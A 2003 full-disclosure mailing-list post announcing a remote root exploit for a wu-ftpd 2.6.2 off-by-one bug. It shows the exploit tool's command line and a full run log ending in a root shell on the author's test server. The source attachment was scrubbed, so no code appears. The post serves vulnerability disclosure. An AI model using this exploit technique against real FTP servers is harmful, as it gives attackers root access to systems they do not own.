Message-ID: <20030804062219.10295.qmail@hackermail.com>
From: xploit at hackermail.com (dong-h0un U)
Subject: wu-ftpd-2.6.2 off-by-one remote exploit.


I succeeded on RedHat Linux (x86) with wu-2.6.2(1), 2.6.2(2), 2.6.1, 2.6.0 (most versions).
This is not fake.

An excellent advisory was already announced (2003/07/31):
http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt

This information was very useful to me.
I'm thankful to them.

This works well on my server.
What if it doesn't work on your server?

There are various reasons why it may not work on other servers.
(For example, compiler version, kind of operating system,
or a mistake in the shellcode's position, environment variables, etc.)

I don't think about those. Exert your force. :-)
INetCop Security is poor now. They have a few servers.


* Exploit result:


--
bash$ cat /etc/redhat-release
Red Hat Linux release 6.1 (Cartman)
bash$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
--

bash$ ./0x82-wu262 -htest.inetcop.org -ux82 -pmy_pass -n21 -t2

 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.

 [*] Target: RedHat Linux 6.x Version wu-2.6.2(2) compile.
 [+] address: 0x806aaf0.
 [*] #1 Try, test.inetcop.org:21 ... [  OK  ]
 [1] ftpd connection login.
 [*] ftpd connection success.
 [+] User id input.
 [+] User password input.
 [*] User x82 logged in.
 [2] send exploit code.
 [+] 01: make 0x41414141 directory.
 [+] 02: make shell-code directory.
 [+] 03: make 0x43434343 directory.
 [+] 04: make 0x44444444 directory.
 [+] 05: make 0x45454545 directory.
 [+] 06: make 0x46464646 directory.
 [+] 07: make 0x47474747 directory.
 [+] 08: make 0x48484848 directory.
 [+] 09: make 0x49494949 directory.
 [+] 10: make 0x50505050 directory.
 [+] 11: make 0x51515151 directory.
 [+] 12: make 0x52525252 directory.
 [+] 13: make 0x53535353 directory.
 [+] 14: make 0x54545454 directory.
 [+] 15: make 0x55555555 directory.
 [+] Ok, MKD &shellcode_dir.
 [+] #2 Try, test.inetcop.org:21 ... [  OK  ]
 [3] ftpd connection login.
 [*] ftpd connection success.
 [+] User id input.
 [+] User password input.
 [*] User x82 logged in.
 [4] send exploit code.
 [+] 01: make 0x41414141 directory.
 [+] 02: make shell-code directory.
 [+] 03: make 0x43434343 directory.
 [+] 04: make 0x44444444 directory.
 [+] 05: make 0x45454545 directory.
 [+] 06: make 0x46464646 directory.
 [+] 07: make 0x47474747 directory.
 [+] 08: make 0x48484848 directory.
 [+] 09: make 0x49494949 directory.
 [+] 10: make 0x50505050 directory.
 [+] 11: make 0x51515151 directory.
 [+] 12: make 0x52525252 directory.
 [+] 13: make 0x53535353 directory.
 [+] 14: make 0x54545454 directory.
 [+] 15: make 0x55555555 directory.
 [+] Ok, RMD &shellcode_dir.
 [5] Waiting, execute the shell ...
 [*] Send, command packet !

x82 is happy, x82 is happy, x82 is happy
Linux test.inetcop.org 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
uid=0(root) gid=0(root) egid=501(x82) groups=501(x82),500(secure)
bash#

--

P.S.: Please don't mail me questions about the exploit.
      Sorry for my poor English.


-------------- next part --------------
A non-text attachment was scrubbed...
Name: 0x82-wu262.c
Type: application/octet-stream
Size: 17692 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030804/1bd3c730/0x82-wu262.obj
